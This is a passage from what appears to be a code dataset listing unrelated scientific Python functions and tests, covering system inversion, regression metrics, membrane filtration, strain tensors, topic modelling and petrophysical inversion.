N)) # it will be important later\n\n # initializing the flag variable\n flag = 0\n # initializing the flag variable for the vrft method\n flag_vr = 0\n # initializing the counter of reduction steps done by the algorithm\n kround = 0\n\n # starting the loop of the reduction procedure\n while flag == 0:\n # run a step of the reduction order algorithm\n Ahat, Bhat, Chat, Dhat, yhat, vhat, nhat, phat, rhat = invredc(A, B, C, D, y, v)\n # increase the counter of reductions\n kround = kround + 1\n\n # preallocating the state vector of the inverse system\n xhat = np.zeros((nhat, N - kround)) # it must have N-kround samples\n # preallocating the calculated input\n uhat = np.zeros((m, N - kround))\n\n # defining the reduced time vector\n tt = t[:, 0 : N - kround]\n\n # test the conditions of invertibility\n if phat < m:\n # if this condition is true, then the algorithm has failed and it is not possible to find the inverse\n flag = 1\n flag_vr = 1\n # if this is the case, we print a message and end the execution\n # print('The inversion algorithm has failed')\n return uhat, tt, flag_vr\n else:\n if rhat == m:\n # ((rhat==m)&(rhat==phat)):\n # if this condition is true, then the algorithm is done. We can calculate the signal u\n flag = 2\n # calculating the inverse of the feedforward matrix\n # E=np.linalg.inv(Dhat)\n E = np.linalg.pinv(Dhat)\n else:\n # if none of the conditions above is true, then we need to proceed to another round of the reduction step of the algorithm\n A = Ahat\n B = Bhat\n C = Chat\n D = Dhat\n y = yhat\n v = vhat\n # after the reduction procedure is done, then the system can be inverted\n\n # calculating the dynamic matrix of the inverse system\n Ainv = Ahat - Bhat @ E @ Chat\n # eigenvalues of the inverse system's dynamic matrix\n wv, v = np.linalg.eig(Ainv) # w=eigenvalues, v=eigenvectors\n # calculating the input matrix of the inverse system\n Binv = Bhat @ E\n # calculating the output matrix of the inverse system\n Cinv = -E @ Chat\n # calculating the feedforward matrix of the inverse system\n Dinv = E\n\n # test if the inverse dynamic system is stable\n wbool = wv > 1\n wsum = np.sum(wbool)\n # test if wsum is greater than 1\n if wsum > 0:\n # if wsum is greater than 1, then, the inverse system is unstable, so we end the execution of the algorithm\n # print('The inverse system is unstable')\n flag_vr = 2\n return uhat, tt, flag_vr\n else:\n # if wsum=0, then the inverse system is stable, and we can calculate the input signal\n # calculate the first value for the output (t=0)\n uhat[:, 0] = Cinv @ xhat[:, 0] + Dinv @ yhat[:, 0]\n # calculate the states and the output of the inverse system\n for k in range(0, N - 1 - kround):\n xhat[:, k + 1] = Ainv @ xhat[:, k] + Binv @ yhat[:, k] + vhat[:, k]\n uhat[:, k + 1] = Cinv @ xhat[:, k + 1] + Dinv @ yhat[:, k + 1]\n\n return uhat, tt, flag_vr", "def evaltr(x_solution): \n \n large = 10.0**30\n pred = np.zeros(cfg.ntrain)\n e0 = 0.0 # mean of observed values\n y=0.0\n for i in range(cfg.ntrain): # Computation of correct piece\n e0 += cfg.a_unscaled[i][-1]\n pind = 0\n ipbest = 0\n pbest = -large # for max\n \n for j1 in range(cfg.nomax):\n ipmin=pind\n pmin=large # for min\n for _ in range(cfg.jk[j1]):\n piece=x_solution[(pind+1)*cfg.nfea-1] \n for j3 in range(cfg.nfea-1): #\n piece += x_solution[pind*cfg.nfea+j3]*cfg.a_unscaled[i][j3]\n if piece < pmin:\n ipmin = pind\n pmin = piece\n pind += 1 \n \n if pmin > pbest:\n ipbest = ipmin\n pbest = pmin\n \n pred[i] = x_solution[(ipbest+1)*cfg.nfea-1] # Computation of prediction\n for j1 in range(cfg.nfea-1):\n pred[i] += x_solution[ipbest*cfg.nfea+j1]*cfg.a_unscaled[i][j1]\n y += pred[i]\n \n y = y/cfg.ntrain \n e0 = e0/cfg.ntrain\n \n # Computation of indices\n rmse = 0.0\n mae = 0.0\n e1 = 0.0\n for i in range(cfg.ntrain):\n rmse += (pred[i]-cfg.a_unscaled[i][-1])**2\n mae += np.abs(pred[i]-cfg.a_unscaled[i][-1]) \n e1 += (cfg.a_unscaled[i][-1] - e0)**2\n ce = 1.0 - rmse/e1 \n rmse = np.sqrt(rmse/cfg.ntrain)\n mae = mae/cfg.ntrain \n\n if cfg.ntrain > 1:\n sx=0.0\n sy=0.0\n rcor=0.0\n for i in range(cfg.ntrain):\n sx += (pred[i]-y)**2\n sy += (cfg.a_unscaled[i][-1]-e0)**2 \n rcor += (pred[i]-y) * (cfg.a_unscaled[i][-1]-e0) \n\n r = rcor/np.sqrt(sx*sy)\n \n return rmse,mae,ce,r", "def test_get_nveto_pmt_item(self):\n pass", "def fig16():\n # fmt: off\n tpm = np.array([\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [1, 0, 0, 0, 0, 0, 0],\n [1, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [1, 0, 0, 0, 0, 1, 1],\n [1, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n ])\n cm = np.array([\n [0, 1, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 1, 0, 0, 0, 0, 0],\n [0, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 0, 0, 0, 1, 1],\n ])\n # fmt: on\n return Network(tpm, cm=cm, node_labels=LABELS[:tpm.shape[1]])", "def V2E(V):\n# for v in m/s returns energy in meV\n return 5.227e-6*V*V", "def gen_new_phiw_div_phib_arr(N_PROCESSES, phiw_div_phib_arr_new, cond_GT, fcn_D, fcn_eta, z_div_L_arr, phiw_div_phib_arr, Pi_div_DLP_arr, weight, gp_arr, gm_arr, yt_arr, phi_yt_arr, ID_yt_arr, Ieta_yt_arr):\n phi_b = cond_GT['phi_bulk']\n ed = cond_GT['epsilon_d']\n membrane_geometry = cond_GT['membrane_geometry']\n \n Ny = size(yt_arr)\n # # Python allocate the name for phi_yt_arr[0], this is the same as reference value for C++ \" y= &x\"\n phi_arr_z0 = phi_yt_arr[0]\n Ieta_arr_z0= Ieta_yt_arr[0]\n ID_arr_z0 = ID_yt_arr[0]\n\n ind_z0 = 0 #z-index at inlet\n \n z0_div_L = 0. #z-coord at inlet\n \n r0_div_R = 0. #r-coord at the centerline of pipe\n rw_div_R = 1. #r-coord at the membrane wall\n \n vw_div_vw0_z0 = get_v_conv(rw_div_R, z0_div_L, Pi_div_DLP_arr[ind_z0], cond_GT, gp_arr[ind_z0], gm_arr[ind_z0])\n gen_phi_wrt_yt(z0_div_L, phiw_div_phib_arr[ind_z0]*phi_b, fcn_D, vw_div_vw0_z0, yt_arr, phi_arr_z0, cond_GT)\n gen_INT_inv_f_wrt_yt(yt_arr, phi_arr_z0, Ieta_arr_z0, fcn_eta, cond_GT)\n Ieta_arr_z0 /= Ieta_arr_z0[-1] # CHECK\n gen_INT_inv_f_wrt_yt(yt_arr, phi_arr_z0, ID_arr_z0, fcn_D, cond_GT)\n\n uZ_z0 = get_uZ_out(z0_div_L, cond_GT['k'], cond_GT['Bp'], cond_GT['Bm'], gp_arr[ind_z0], gm_arr[ind_z0])\n F2_0 = cal_F2_Z(vw_div_vw0_z0, ed, yt_arr, Ieta_arr_z0, ID_arr_z0, uZ_z0, membrane_geometry)\n\n Nz = size(z_div_L_arr)\n if (N_PROCESSES ==1):\n # when only single-processor is allocated\n for i in range(1, Nz):\n phiw_div_phib_arr_new[i] = process_at_zi(z_div_L_arr[i], phiw_div_phib_arr[i]*phi_b, Pi_div_DLP_arr[i], cond_GT, gp_arr[i], gm_arr[i], yt_arr, phi_yt_arr[i], Ieta_yt_arr[i], fcn_eta, ID_yt_arr[i], fcn_D, F2_0)\n else:\n # this uses multiprocessing packages\n import multiprocessing as mp\n \n pool = mp.Pool(N_PROCESSES)\n args_list = [(z_div_L_arr[i], phiw_div_phib_arr[i]*phi_b, Pi_div_DLP_arr[i], cond_GT, gp_arr[i], gm_arr[i], yt_arr, phi_yt_arr[i], Ieta_yt_arr[i], fcn_eta, ID_yt_arr[i], fcn_D, F2_0)\\\n for i in range(1, Nz)]\n phiw_div_phib_arr_new[1:] = pool.starmap(process_at_zi, args_list)\n pool.close()\n pool.join()\n\n cnt_EXCEED = 0 \n for i,x in enumerate(phiw_div_phib_arr_new):\n\n x = x*cond_GT['phi_bulk']\n if x > cond_GT['phi_freeze']:\n cnt_EXCEED += 1\n phiw_div_phib_arr_new[i] = cond_GT['phi_freeze']/cond_GT['phi_bulk'] # this prevent the accidently beyond the freezing concentration\n if(cnt_EXCEED>0):\n print('Warning: exceed phi_freeze %d times out of %d\\n'%(cnt_EXCEED, cond_GT['Nz']))\n\n FPI_operator(cond_GT['weight'], phiw_div_phib_arr, phiw_div_phib_arr_new, N_skip=1) # phiw(0) must be phib.\n\n return 0", "def test_compute_inventory():\n T = [1000]\n c_max = [1e20]\n time = 1e3\n inv, sig = divHretention.compute_inventory(T, c_max, time)\n assert len(inv) == len(sig)\n assert len(inv) == len(T)", "def MPinv(list_of_ch,direction, angle, azimuth):\n\n\n \"\"\"~~~~~~~~~~~ Input conditions ~~~~~~~~~~~~~~\"\"\"\n ch_list = list_of_ch\n direction_deg = float(direction) #inclined direction of wellbore from North\n angle_deg = float(angle) # inclined angle of well \n azimuth_deg = float(azimuth) # core orientation from North or inclined direction \n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n azimuth_deg = azimuth_deg - 45\n\n \"\"\"~~~~~~~~~~~ Allocate numbers to each direction (for example, xx => 0, xy => 3 etc...) ~~~~~~~~~~~~~~\"\"\"\n ch_col = ch_list.columns.values\n\n if \"xx\" in ch_col: ch_list.at[\"ch_no\",\"xx\"] =0\n if \"yy\" in ch_col: ch_list.at[\"ch_no\",\"yy\"] =1\n if \"zz\" in ch_col: ch_list.at[\"ch_no\",\"zz\"] =2\n if \"xy\" in ch_col: ch_list.at[\"ch_no\",\"xy\"] =3\n if \"yx\" in ch_col: ch_list.at[\"ch_no\",\"yx\"] =4\n if \"yz\" in ch_col: ch_list.at[\"ch_no\",\"yz\"] =5\n if \"zy\" in ch_col: ch_list.at[\"ch_no\",\"zy\"] =6\n if \"zx\" in ch_col: ch_list.at[\"ch_no\",\"zx\"] =7\n if \"xz\" in ch_col: ch_list.at[\"ch_no\",\"xz\"] =8\n\n ch = ch_list.loc[\"ch_no\",:].values\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n Number_of_vector = len(ch)\n No_v = Number_of_vector\n direction_rad = direction_deg*pi*180**(-1) \n angle_rad = angle_deg*pi*180**(-1) \n azimuth_rad = azimuth_deg*pi*180**(-1) \n\n\n \"\"\"~~~~~~~~ Create matrix of Direction Cosine vectors~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n c=np.cos(0.25*pi)\n s=np.sin(0.25*pi)\n n = np.zeros((3,9))\n\n n[:,0] = np.array([1,0,0])\n n[:,1] = np.array([0,1,0])\n n[:,2] = np.array([0,0,1])\n n[:,3] = np.array([c,s,0])\n n[:,4] = np.array([c,-s,0])\n n[:,5] = np.array([0,c,s])\n n[:,6] = np.array([0,c,-s])\n n[:,7] = np.array([c,0,s])\n n[:,8] = np.array([-c,0,s])\n\n\n \"\"\"~~~~~~~~~~~~~~ coordinate transformation from 'ASR local co-ordinate' to 'Geological co-ordinate' ~~~~~~~~~~~~~~~~~\"\"\"\n cdr = np.cos(direction_rad)\n sdr = np.sin(direction_rad)\n\n caz = np.cos(azimuth_rad)\n saz = np.sin(azimuth_rad)\n\n can = np.cos(angle_rad)\n san = np.sin(angle_rad)\n\n Rdr = np.array([[cdr, sdr, 0],[-sdr, cdr, 0],[0, 0, 1]]) #counter_clockwise\n Ran = np.array([[1, 0, 0],[0, can, san],[0, -san, can]])\n Raz = np.array([[caz, -saz, 0],[saz, caz, 0],[0, 0, 1]])\n\n R1 = Ran.dot(Rdr)\n R2 = Raz.dot(R1)\n\n for i in range(0,9):\n n[:,i] = R2.dot(n[:,i])\n n= np.round(n,6)\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n\n\n\n \"\"\"~~~~~~~~ Create matrix A (b = Ax: b;Observed normal strain data, x;strain tensor component which we have to determine) ~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n X = np.empty((No_v,6))\n\n for i in range(0,No_v):\n cc = ch[i]\n X[i,:] = np.array([n[0,cc]**2, n[1,cc]**2, n[2,cc]**2, 2*n[0,cc]*n[1,cc], 2*n[1,cc]*n[2,cc], 2*n[2,cc]*n[0,cc]])\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n X_inv = np.linalg.pinv(X) # Calculate Moore-Penrose inverse matrix\n\n return X_inv", "def eval(self, sample):\n '''\n jv = sample.get(JOINT_VELOCITIES)\n eepv = sample.get(END_EFFECTOR_POINT_VELOCITIES)\n\n boxpos = jv[:, 2:5]\n fingerpos = eepv[:, 7:10]\n tgtpos = np.zeros((100,3))\n for i in range(100):\n tgtpos[i] = [0.6, 0.2, 0.1]\n \n fetchdist = np.sum((boxpos - fingerpos) ** 2, axis=1)\n liftdist = np.sum((boxpos - tgtpos) ** 2, axis=1)\n \n l = fetchdist + liftdist\n '''\n\n eept = sample.get(END_EFFECTOR_POINTS)\n eepv = sample.get(END_EFFECTOR_POINT_VELOCITIES)\n sample_u = sample.get_U()\n cfrc_ext = np.concatenate((eept[:, 13:56], eepv[:, 0:41]), axis = 1)\n # vec = eepv[:, 64:66] \n # dist = np.sum(np.square(vec), axis=1) / 5\n forward_reward = eepv[:, 53]\n scaling = 150\n ctrl_cost = 0.5 * 1e-2 * np.sum(np.square(sample_u / scaling), axis = 1)\n # contact_cost = 0.5 * 1e-3 * np.sum(np.square(cfrc_ext), axis = 1)\n # survive_reward = 0.5\n \n l = -forward_reward + ctrl_cost\n\n prefix=''\n logger.record_tabular('PolReturn', -sum(l))\n\n ave_vel = np.mean(forward_reward)\n min_vel = np.min(forward_reward)\n max_vel = np.max(forward_reward)\n std_vel = np.std(forward_reward)\n logger.record_tabular(prefix+'PolAverageVelocity', ave_vel)\n logger.record_tabular(prefix+'PolMinVelocity', min_vel)\n logger.record_tabular(prefix+'PolMaxVelocity', max_vel)\n logger.record_tabular(prefix+'PolStdVelocity', std_vel)\n logger.dump_tabular(with_prefix=False)\n \n lx, lu, lxx, luu, lux = 0, 0, 0, 0, 0\n\n '''\n # Compute weighted sum of each cost value and derivatives.\n weight = self._weights[0]\n l = l * weight\n lx = lx * weight\n lu = lu * weight\n lxx = lxx * weight\n luu = luu * weight\n lux = lux * weight\n for i in range(1, len(self._costs)):\n pl, plx, plu, plxx, pluu, plux = self._costs[i].eval(sample)\n weight = self._weights[i]\n l = l + pl * weight\n lx = lx + plx * weight\n lu = lu + plu * weight\n lxx = lxx + plxx * weight\n luu = luu + pluu * weight\n lux = lux + plux * weight\n '''\n \n return l, lx, lu, lxx, luu, lux", "def test_active_inference_SPM_1a(self):\n array_path = os.path.join(os.getcwd(), DATA_PATH + \"vbx_test_1a.mat\")\n mat_contents = loadmat(file_name=array_path)\n\n A = mat_contents[\"A\"][0]\n B = mat_contents[\"B\"][0]\n C = to_arr_of_arr(mat_contents[\"C\"][0][0][:,0])\n obs_matlab = mat_contents[\"obs\"].astype(\"int64\")\n policy = mat_contents[\"policies\"].astype(\"int64\") - 1\n t_horizon = mat_contents[\"t_horizon\"][0, 0].astype(\"int64\")\n actions_matlab = mat_contents[\"actions\"].astype(\"int64\") - 1\n qs_matlab = mat_contents[\"qs\"][0]\n xn_matlab = mat_contents[\"xn\"][0]\n vn_matlab = mat_contents[\"vn\"][0]\n\n likelihoods_matlab = mat_contents[\"likelihoods\"][0]\n\n num_obs, num_states, _, num_factors = get_model_dimensions(A, B)\n obs = convert_observation_array(obs_matlab, num_obs)\n T = len(obs)\n\n agent = Agent(A=A, B=B, C=C, inference_algo=\"MMP\", policy_len=1, \n inference_horizon=t_horizon, use_BMA = False, \n policy_sep_prior = True)\n \n actions_python = np.zeros(T)\n\n for t in range(T):\n o_t = (np.where(obs[t])[0][0],)\n qx, xn_t, vn_t = agent.infer_states_test(o_t)\n q_pi, efe= agent.infer_policies()\n action = agent.sample_action()\n\n actions_python[t] = action\n\n xn_python = build_xn_vn_array(xn_t)\n vn_python = build_xn_vn_array(vn_t)\n\n if t == T-1:\n xn_python = xn_python[:,:,:-1,:]\n vn_python = vn_python[:,:,:-1,:]\n\n start_tstep = max(0, agent.curr_timestep - agent.inference_horizon)\n end_tstep = min(agent.curr_timestep + agent.policy_len, T)\n\n xn_validation = xn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n vn_validation = vn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n\n self.assertTrue(np.isclose(xn_python, xn_validation).all())\n self.assertTrue(np.isclose(vn_python, vn_validation).all())\n \n self.assertTrue(np.isclose(actions_matlab[0,:],actions_python[:-1]).all())", "def TCVB0(docs, alpha, beta, epsilon=0.0001, log=no_log):\n D, V = docs.shape\n K = len(alpha)\n\n #store variational q_{z_{d,w} = t} for each d as sparse table in\n #array z\n z = np.zeros(D, dtype=object)\n\n #initialize counts\n #N[t, w] = expectaction of unnormalized phi_{k,w}\n N = np.zeros((V, K), dtype=float)\n\n #Nd[d, t] = unnormalized theta_{d,k}\n Nd = np.zeros((D, K), dtype=float)\n\n for d in xrange(D):\n #random initialization\n init = rand(docs[d].nnz * K)\n active_words = docs[d].nonzero()[1]\n ij = (np.repeat(active_words, K), np.tile(np.arange(K), len(active_words)))\n\n #z[d] is VxK sparse row matrix\n z[d] = csr_matrix((init, ij), shape=(V, K))\n\n #normalize z[d]\n z[d] = normalize(z[d], norm='l1', axis=1)\n\n #update counts\n #set_trace()\n M = diag(docs[d]).dot(z[d]).toarray()\n N += M\n Nd[d] = M.sum(axis=0) + alpha\n\n log('document %d/%d preinitialized' % (d + 1, D))\n\n #sum of array and matrix is matrix, so convertion is required\n N = np.asarray(N) + beta\n\n #Nt[t] is pre-computed unnormalized expectation topic t\n Nt = np.squeeze(np.asarray(N.sum(axis=0)))\n if type(beta) is float:\n Nt += V * beta\n elif type(beta) is np.ndarray:\n Nt += beta.sum(axis=0)\n else:\n raise 'beta must be either scalar (float) number for symmetric prior or a full matrix VxK for custom prior'\n\n #do variational updates until convergence\n iteration = 1\n while True:\n iteration_time = time()\n avg_diff = 0.0\n\n #for each document\n for d in xrange(D):\n #for each word in a document\n max_diff = 0.0\n doc_diff = 0.0\n\n doc_w = docs.data[docs.indptr[d]:docs.indptr[d + 1]]\n\n i = 0\n old_z_d = z[d].data.copy()\n #for each word in the document d\n #do variational update and estimate difference\n for w in docs.indices[docs.indptr[d]:docs.indptr[d + 1]]:\n #save old q(z_d) distribution\n old_z = z[d].data[z[d].indptr[w]:z[d].indptr[w + 1]] * doc_w[i]\n #we take expectations ignoring current document and current word\n N[w] -= old_z\n Nt[:] -= old_z\n Nd[d] -= old_z\n #update\n new_z = N[w] / Nt * Nd[d]\n #normalization\n new_z /= new_z.sum()\n #write new values back\n z[d].data[z[d].indptr[w]:z[d].indptr[w + 1]] = new_z\n #expectations update\n new_z *= doc_w[i]\n N[w] += new_z\n Nt[:] += new_z\n Nd[d] += new_z \n\n i += 1\n\n #word_diff = variational_update(d, w)\n doc_diff += np.abs(old_z_d - z[d].data)\n avg_diff += doc_diff.sum()\n max_diff = max(max_diff, doc_diff.max())\n if d % 100 == 0:\n log('document %d/%d was updated' % (d + 1, D))\n\n avg_diff /= docs.nnz * K\n log('iteration %d. avg diff: %f. max diff: %f. time: %f' % (iteration, avg_diff, max_diff, time() - iteration_time))\n\n if max_diff < epsilon:\n break\n\n iteration += 1\n\n return z", "def ORM2(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dk,Dpf],[HIc1,HIk,HIpf],[1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=0.000 # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[1] # Volume of organic component\n\t\tPHIe=XMatrix[2] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro 